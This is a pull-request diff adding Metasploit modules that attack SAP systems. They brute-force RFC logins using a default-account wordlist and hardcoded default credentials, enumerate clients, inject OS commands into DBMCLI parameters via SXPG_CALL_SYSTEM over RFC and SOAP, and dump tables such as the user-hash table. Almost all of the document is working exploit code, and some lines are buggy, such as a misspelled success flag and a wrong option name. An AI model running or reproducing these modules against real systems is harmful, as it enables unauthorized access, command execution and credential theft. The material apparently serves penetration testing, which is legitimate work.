### PR TITLE
SAP RFC aux and exploit modules

### DIFF
--- a/data/wordlists/sap_common.txt
+++ b/data/wordlists/sap_common.txt
@@ -1,0 +1,10 @@
+sapservice<SAPSID>
+sapadm
+<SAPSID>adm
+sqd<SAPSID>
+sap<SAPSID>db
+<SAPSID>
+sapservice<SAPSID>
+sapr3
+sapsr3
+ora<SAPSID>

--- a/modules/auxiliary/sap/sap_rfc_brute_login.rb
+++ b/modules/auxiliary/sap/sap_rfc_brute_login.rb
@@ -1,0 +1,181 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::AuthBrute
+  include NWRFC
+
+  def initialize
+    super(
+           'Name'           => 'SAP RFC Brute Forcer',
+           'Version'        => '$Revision$',
+           'Description'    => %q{
+				                  This module attempts to brute force the username | password via an RFC interface.
+                                  Default clients can be tested without needing to set a CLIENT.
+                                  Common/Default user and password combinations can be tested without needing to set a USERNAME, PASSWORD, USER_FILE or PASS_FILE.
+                                  The default usernames and password combinations are stored in ./data/wordlists/sap_rfc_common.txt.
+                                  This module can execute through a SAP Router if SRHOST and SRPORT values are set.
+                                  The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc).
+				                 },
+           'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+           'Author'         => ['nmonkee'],
+	       'License'        => BSD_LICENSE
+           )
+
+      register_options(
+			[
+			  Opt::RPORT(3342),
+			  OptString.new('CLIENT', [true, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
+              OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+              OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+              OptBool.new('VERBOSE', [false, "Be Verbose", false])
+			], self.class)
+    end
+
+    def run_host(ip)
+      print_status("Brute forcing #{USER}") if datastore['USER']
+      print_status("Using provided user wordlist") if datastore['USER_FILE']
+      print_status("Using provided password wordlist") if datastore['PASS_FILE']
+      if datastore['USERPASS_FILE']
+        print_status("Using provided user/password wordlist")
+      else 
+        datastore['USERPASS_FILE'] = Msf::Config.data_directory + '/wordlists/sap_rfc_common.txt'
+        print_status("Using default sap_rfc_common.txt")
+      end
+    
+      if datastore['CLIENT'].nil?
+        print_status("Using default SAP client list")
+        client = ['000', '001', '066']
+      else
+        if datastore['CLIENT'] =~ /^\d{3},/
+          client = datastore['CLIENT'].split(/,/)
+          print_status("Brute forcing clients #{datastore['CLIENT']}")
+        elsif 
+          datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/
+          array = datastore['CLIENT'].split(/-/)
+          client = (array.at(0)..array.at(1)).to_a
+          print_status("Brute forcing clients #{datastore['CLIENT']}")
+        elsif
+          datastore['CLIENT'] =~ /^\d{3}\z/
+          client = datastore['CLIENT']
+          print_status("Brute forcing client #{datastore['CLIENT']}")
+        else  
+          print_status("Invalid CLIENT - using default SAP client list instead")
+          client = ['000', '001', '066']
+        end
+     end
+
+     rport = datastore['rport'].to_s.split('')
+     sysnr = rport[2]
+     sysnr << rport[3]
+				
+	 $success = false
+
+     $saptbl = Msf::Ui::Console::Table.new(
+              Msf::Ui::Console::Table::Style::Default,
+              'Header'  => "[SAP] Credentials",
+              'Prefix'  => "\n",
+              'Postfix' => "\n",
+              'Indent'  => 1,
+              'Columns' =>
+                          [
+                           "host",
+                           "port",
+                           "client",
+                           "user",
+                           "pass",
+                           "status"
+                          ])
+	 
+     client.each { |client|
+       each_user_pass do |user, pass|
+         brute_user(user,client,pass,datastore['rhost'],datastore['rport'],sysnr)
+       end
+     }
+     
+     if $success
+       print($saptbl.to_s)
+       return
+     end
+   end
+
+   def brute_user(user, client, pass, rhost, rport, sysnr)
+   
+   ashost = rhost
+  
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+   
+   verbose = datastore['VERBOSE']
+   print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}'") if verbose == true
+
+   begin
+     auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+     conn = Connection.new(auth_hash)
+   rescue NWError => e
+     if verbose == true
+       print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+       print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+       print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+       print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+       print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+     end
+     $saptbl << [rhost, rport, client, user, pass, 'pass change'] if e.message =~ /Password must be changed/
+     $saptbl << [rhost, rport, client, user, pass, 'locked'] if e.message =~ /Password logon no longer possible - too many failed attempts/
+     return
+   end
+   
+   begin
+     conn_info = conn.connection_info
+     $saptbl << [rhost, rport, client, user, pass, '']
+     success = true
+   rescue
+     print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+     return
+   end
+   
+   conn.disconnect
+   
+   $success = true
+   
+   if $success 
+     report_auth_info(
+                      :host => rhost,
+                      :sname => 'sap-gateway',
+                      :proto => 'tcp',
+                      :port => rport,
+                      :client => client,
+                      :user => user,
+                      :pass => pass,
+                      :sysnr => sysnr,
+                      :source_type => "user_supplied",
+                      :target_host => rhost,
+                      :target_port => rport
+                     )
+    end
+  end
+end

--- a/modules/auxiliary/sap/sap_rfc_client_enum.rb
+++ b/modules/auxiliary/sap/sap_rfc_client_enum.rb
@@ -1,0 +1,137 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include NWRFC
+
+  def initialize
+    super(
+          'Name'        => 'SAP RFC Client Enumerator',
+	      'Version'     => '$Revision$',
+	      'Description' => %q{
+				               This module attempts to brute force the available SAP clients via the RFC interface. 
+				               Default clients can be tested without needing to set a CLIENT.
+                               This module can execute through a SAP Router if SRHOST and SRPORT values are set. 
+                               The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc).
+				            },
+          'References'  => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+          'Author'      => [ 'nmonkee' ],
+          'License'     => BSD_LICENSE
+          )
+
+  register_options(
+		   [
+             Opt::RPORT(3342),
+		     OptString.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
+             OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+             OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+             OptBool.new('VERBOSE', [false, "Be Verbose", false])
+           ], self.class)
+  end
+
+  def run_host(ip)
+    user = "SAP*"
+    pass = "nmonkee"
+    if datastore['CLIENT'].nil?
+      print_status("Using default SAP client list")
+      client = ['000', '001', '066']
+    else
+      if datastore['CLIENT'] =~ /^\d{3},/
+        client = datastore['CLIENT'].split(/,/)
+        print_status("Brute forcing clients #{datastore['CLIENT']}")
+      elsif 
+        datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/
+        array = datastore['CLIENT'].split(/-/)
+        client = (array.at(0)..array.at(1)).to_a
+        print_status("Brute forcing clients #{datastore['CLIENT']}")
+      elsif
+        datastore['CLIENT'] =~ /^\d{3}\z/
+        client = datastore['CLIENT']
+        print_status("Brute forcing client #{datastore['CLIENT']}")
+      else  
+        print_status("Invalid CLIENT - using default SAP client list instead")
+        client = ['000', '001', '066']
+      end
+   end
+
+   rport = datastore['rport'].to_s.split('')
+   sysnr = rport[2]
+   sysnr << rport[3]
+
+   client.each { |client|
+     enum_client(user,client,pass,datastore['rhost'],datastore['rport'],sysnr)
+    }
+ end
+
+ def enum_client(user, client, pass, rhost, rport, sysnr)
+  
+  verbose = datastore['VERBOSE']
+  print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}'") if verbose == true
+  
+  success = false
+  
+  ashost = rhost
+  
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+
+  begin
+    auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+    conn = Connection.new(auth_hash)		
+    rescue NWError => e
+      if e.message =~ /not available in this system/
+        print_error("#{rhost}:#{rport} [SAP] client #{client} does not exist") if verbose == true
+      elsif e.message =~ /Logon not possible/
+        print_error("#{rhost}:#{rport} [SAP] client #{client} does not exist") if verbose == true         
+      elsif e.message =~ /Connection refused/
+        print_error("#{rhost}:#{rport} [SAP] client #{client} connection refused") if verbose == true         
+      else
+        print_good("#{rhost}:#{rport} [SAP] client found - #{client}")
+	success = true
+      end
+      return
+    end
+        
+    if success
+      print_good("#{rhost}:#{rport} [SAP] client found - #{client}")
+      report_auth_info(
+                     :host          => rhost,
+                     :sname         => 'sap-gateway',
+                     :proto         => 'tcp',
+                     :port          => rport,
+                     :client        => client,
+                     :user          => user,
+                     :pass          => pass,
+                     :sysnr         => sysnr,
+                     :source_type   => 'user_supplied',
+                     :target_host   => rhost,
+                     :target_port   => rport
+                      )
+      return
+    end
+  end
+end

--- a/modules/auxiliary/sap/sap_rfc_dbmcli_sxpg_call_system_command_exec.rb
+++ b/modules/auxiliary/sap/sap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -1,0 +1,153 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+	
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name' => 'SAP SOAP RFC DBMCLI Command Injection (via SXPG_CALL_SYSTEM)',
+			'Version' => '$Revision$',
+			'Description' => %q{
+				This module makes use of the SXPG_CALL_SYSTEM Remote Function Call
+				(via SOAP) to execute OS commands via DBMCLI command as configured in SM69.
+				},
+				'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+				'Author'	=> [ 'nmonkee' ],
+				'License'	=> BSD_LICENSE
+			)
+		register_options(
+			[
+				OptString.new('RHOSTS', [true, 'SAP ICM server address', nil]),
+				OptString.new('RPORT', [true, 'SAP ICM server port number', nil]),
+				OptString.new('CLIENT', [true, 'Client', nil]),
+				OptString.new('USER', [true, 'Username', nil]),
+				OptString.new('PASS', [true, 'Password', nil]),
+				OptString.new('OS', [true, 'Windows/Linux', "Linux"]),
+				OptString.new('CMD', [true, 'Command to run', "id"]),
+			], self.class)
+	end
+
+	def run_host(ip)
+		payload,command = create_payload(1)
+		exec_command(ip,payload,command)
+		payload,command = create_payload(2)
+		exec_command(ip,payload,command)
+	end
+
+	def create_payload(num)
+		command = ""
+		os = "ANYOS"
+		if datastore['OS'].downcase == "linux"
+			if num == 1
+				command = "-o /tmp/pwned.txt -n pwnie" + "\n!"
+				command << datastore['CMD'].gsub(" ","\t")
+				command << "\n"
+			end
+			command = "-ic /tmp/pwned.txt" if num == 2
+		elsif datastore['OS'].downcase == "windows"
+			if num == 1
+				command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
+				space = "%programfiles:~10,1%"
+				command << datastore['COMMAND'].gsub(" ",space)
+			end
+			command = '-ic c:\\\pwn.out' if num == 2
+		end
+		data = '<?xml version="1.0" encoding="utf-8" ?>' + "\r\n"
+		data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' + "\r\n"
+		data << '<env:Body>' + "\r\n"
+		data << '<n1:SXPG_CALL_SYSTEM xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' + "\r\n"
+		data << '<ADDITIONAL_PARAMETERS>' + command + ' </ADDITIONAL_PARAMETERS>' + "\r\n"
+		data << '<COMMANDNAME>DBMCLI</COMMANDNAME>' + "\r\n"
+		data << '<OPERATINGSYSTEM>' + os + '</OPERATINGSYSTEM>' + "\r\n"
+		data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>' + "\r\n"
+		data << '</n1:SXPG_CALL_SYSTEM>' + "\r\n"
+		data << '</env:Body>' + "\r\n"
+		data << '</env:Envelope>' + "\r\n"
+		return data, command
+	end
+
+	def exec_command(ip,data,command)
+		user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
+		print_status("#{datastore['RHOSTS']}:#{datastore['RPORT']} - sending SOAP SXPG_CALL_SYSTEM request")
+		begin
+			res = send_request_raw(
+				{
+					'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+					'method' => 'POST',
+					'data' => data,
+					'headers' => {
+						'Content-Length' => data.size.to_s,
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+						'Authorization' => 'Basic ' + user_pass,
+						'Content-Type' => 'text/xml; charset=UTF-8',
+						}
+				}, 45)
+			if (res.code != 500 and res.code != 200)
+				# to do - implement error handlers for each status code, 404, 301, etc.
+				print_error("#{datastore['RHOSTS']}:#{datastore['RPORT']} - something went wrong!")
+				return
+			else
+				success = true
+				print_status("#{datastore['RHOSTS']}:#{datastore['RPORT']} - got response")
+				response = res.body
+				if response =~ /faultstring/
+					error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+					sucess = false
+				end
+				output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+				result = []
+				for i in 0..output.length-1
+					if output[i] =~ /E[rR][rR]/ || output[i] =~ /---/ || output[i] =~ /for database \(/ 
+						#nothing
+					elsif output[i] =~ /unknown host/ || output[i] =~ /; \(see/ || output[i] =~ /returned with/
+						#nothing
+					elsif output[i] =~ /External program terminated with exit code/
+						#nothing
+					else
+						temp = output[i].gsub("&#62",">")
+						temp_ = temp.gsub("&#34","\"")
+						temp__ = temp_.gsub("&#39","'")
+						result << temp__ + "\n"
+					end
+				end
+				saptbl = Msf::Ui::Console::Table.new(
+					Msf::Ui::Console::Table::Style::Default,
+					'Header'  => "[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection",
+					'Prefix'  => "\n",
+					'Postfix' => "\n",
+					'Indent'  => 1,
+					'Columns' =>["Output",]
+					)
+				for i in 0..result.length/2-1
+					saptbl << [result[i].chomp]
+				end
+				print (saptbl.to_s)
+			end
+		rescue ::Rex::ConnectionError
+			print_error("#{datastore['RHOSTS']}:#{datastore['RPORT']} - Unable to connect")
+			return
+		end
+		if sucess == false
+			for i in 0..error.length-1
+				print_error("#{datastore['RHOSTS']}:#{datastore['RPORT']} - error #{error[i]}")
+			end
+		end
+	end
+end

--- a/modules/auxiliary/sap/sap_rfc_dbmcli_sxpg_command_exec.rb
+++ b/modules/auxiliary/sap/sap_rfc_dbmcli_sxpg_command_exec.rb
@@ -1,0 +1,159 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+  	include NWRFC
+
+	def initialize
+    	super(
+    		'Name' => 'SAP RFC SXPG_CALL_SYSTEM',
+    		'Version' => '$Revision$',
+    		'Description' => %q{
+				This module makes use of the SXPG_CALL_SYSTEM Remote Function Call to execute OS commands as configured in SM69.
+				The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+				},
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+			'Author' => [ 'nmonkee' ],
+			'License' => BSD_LICENSE
+			)
+		register_options(
+			[
+				Opt::RPORT(3342),
+				OptString.new('USER', [true, 'Username', 'SAP*']),
+				OptString.new('PASS', [true, 'Password', '06071992']),
+				OptString.new('CLIENT', [true, 'Client', '001']),
+				OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+				OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+				OptString.new('CMD', [true, 'Command', 'id']),
+				OptString.new('OS', [true, 'Windows/Linux', "Linux"]),
+				OptBool.new('VERBOSE', [false, "Be Verbose", false])
+			], self.class)
+	end
+	
+	def run_host(ip)
+		user = datastore['USER'] if datastore['USER']
+		pass = datastore['PASS'] if datastore['PASS']
+		if datastore['CLIENT']
+			client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+		end
+		rport = datastore['RPORT'].to_s.split('')
+		sysnr = rport[2]
+		sysnr << rport[3]
+		command = create_payload(1)
+		exec_CMD(user,client,pass,datastore['rhost'],datastore['rport'],sysnr,command)
+		command = create_payload(2)
+		exec_CMD(user,client,pass,datastore['rhost'],datastore['rport'],sysnr,command)
+	end
+  
+	def create_payload(num)
+  		command = ""
+		os = "ANYOS"
+		if datastore['OS'].downcase == "linux"
+			if num == 1
+				command = "-o /tmp/pwned.txt -n pwnie" + "\n!"
+				command << datastore['CMD'].gsub(" ","\t")
+				command << "\n"
+			end
+			command = "-ic /tmp/pwned.txt" if num == 2
+		elsif datastore['OS'].downcase == "windows"
+			if num == 1
+				command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
+				space = "%programfiles:~10,1%"
+				command << datastore['COMMAND'].gsub(" ",space)
+			end
+			command = '-ic c:\\\pwn.out' if num == 2
+		end
+		return command
+	end
+	
+	def exec_CMD(user,client,pass,rhost,rport,sysnr,command)
+    	verbose = datastore['VERBOSE']
+    	print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}' username:'#{user}' password:'#{pass}'") if verbose == true
+    	success = false
+    	ashost = rhost
+    	if datastore['SRHOST']
+    		ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+    	end
+    	begin
+    		auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+    		conn = Connection.new(auth_hash)
+    	rescue NWError => e
+    		print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+			print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+			print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+			print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+			print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+			print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+			print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+			return
+		end
+		begin
+			conn_info = conn.connection_info
+		rescue
+			print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+			return
+		end
+		function = conn.get_function("SXPG_COMMAND_EXECUTE")
+		fc = function.get_function_call
+		os = "ANYOS"
+		fc[:COMMANDNAME] = 'DBMCLI'
+		fc[:ADDITIONAL_PARAMETERS] = command
+		fc[:OPERATINGSYSTEM] = os
+		begin
+			fc.invoke
+			success = true
+		rescue NWError => e
+			print_error("#{rhost}:#{rport} [SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+		end
+		saptbl = Msf::Ui::Console::Table.new(
+			Msf::Ui::Console::Table::Style::Default,
+				'Header'  => "[SAP] Command Exec",
+				'Prefix'  => "\n",
+				'Postfix' => "\n",
+				'Indent'  => 1,
+				'Columns' => ["Output"]
+				)
+		data_length = fc[:EXEC_PROTOCOL].size
+			result = []
+			for i in 0...data_length
+				data = fc[:EXEC_PROTOCOL][i][:MESSAGE]
+				if data =~ /E[rR][rR]/ || data =~ /---/ || data =~ /for database \(/
+					#nothing
+				elsif data =~ /unknown host/ || data =~ /\(see/ || data =~ /returned with/
+					#nothing
+				elsif data =~ /External program terminated with exit code/
+					#nothing
+				else
+					result << data
+				end
+			end
+			for i in 0..result.length/2-1
+				saptbl << [result[i].chomp]
+			end
+		conn.disconnect
+		if success
+			print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}")
+			print(saptbl.to_s)
+		end
+	end
+end

--- a/modules/auxiliary/sap/sap_rfc_read_table.rb
+++ b/modules/auxiliary/sap/sap_rfc_read_table.rb
@@ -1,0 +1,147 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC RFC_READ_TABLE Data Extractor',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to extract SAP user hashes from USR02.
+                              RFC_ABAP_INSTALL_AND_RUN takes ABAP source lines and executes them. It is common for the the function to be disabled or access revoked in a production system. It is also deprecated. 
+                              The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+      
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+                       OptString.new('TABLE', [true, 'Table to Read', nil]),
+                       OptString.new('FIELDS', [true, 'Fields to Read', '*']),
+                       OptBool.new('VERBOSE', [false, "Be Verbose", false])
+                     ], self.class)
+  end
+
+  def run_host(ip)
+   user = datastore['USER'] if datastore['USER']
+   pass = datastore['PASS'] if datastore['PASS']
+   if datastore['CLIENT']
+     client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+   end
+   rport = datastore['RPORT'].to_s.split('')
+   sysnr = rport[2]
+   sysnr << rport[3]
+   table = datastore['TABLE'] if datastore['TABLE']
+   fields = ['*'] if datastore['FIELDS'].nil?
+   if datastore['FIELDS']
+     fields = datastore['FIELDS'] if datastore['FIELDS'] =~ /$\w^/
+     fields = datastore['FIELDS'].split(',') if datastore['FIELDS'] =~ /\w*,\w*/
+   end
+   exec_READTBL(user,client,pass,datastore['rhost'],datastore['rport'],sysnr,table,fields)
+  end
+
+  def exec_READTBL(user, client, pass, rhost, rport, sysnr, table, fields)
+
+    verbose = datastore['VERBOSE']
+
+    print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}' username:'#{user}' password:'#{pass}'") if verbose == true
+
+    success = false
+    
+    ashost = rhost
+  
+   if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    
+    begin
+      auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+      conn = Connection.new(auth_hash)
+    rescue NWError => e
+      print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+      print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+      print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+      print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+     return
+   end
+        
+   begin
+     conn_info = conn.connection_info
+   rescue
+     print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+     return
+    end
+
+   function = conn.get_function("RFC_READ_TABLE")
+
+   fc = function.get_function_call
+
+   fc[:DELIMITER] = '|'
+
+   fc[:QUERY_TABLE] = table
+
+   fields.each { |field|
+     fc[:FIELDS].new_row {|row|
+       row[:FIELDNAME] = field
+     }
+    }
+
+   begin
+     print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}")
+     fc.invoke
+     rescue NWError => e
+     print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+   end
+
+   success = true
+
+   data_length = fc[:DATA].size
+
+   conn.disconnect
+
+   if success
+       for i in 0...data_length
+       data = fc[:DATA][i][:WA]
+       data.to_str
+       print_good("#{data}")
+     end
+     return
+   end
+  end
+end

--- a/modules/auxiliary/sap/sap_rfc_sxpg_call_system.rb
+++ b/modules/auxiliary/sap/sap_rfc_sxpg_call_system.rb
@@ -1,0 +1,165 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
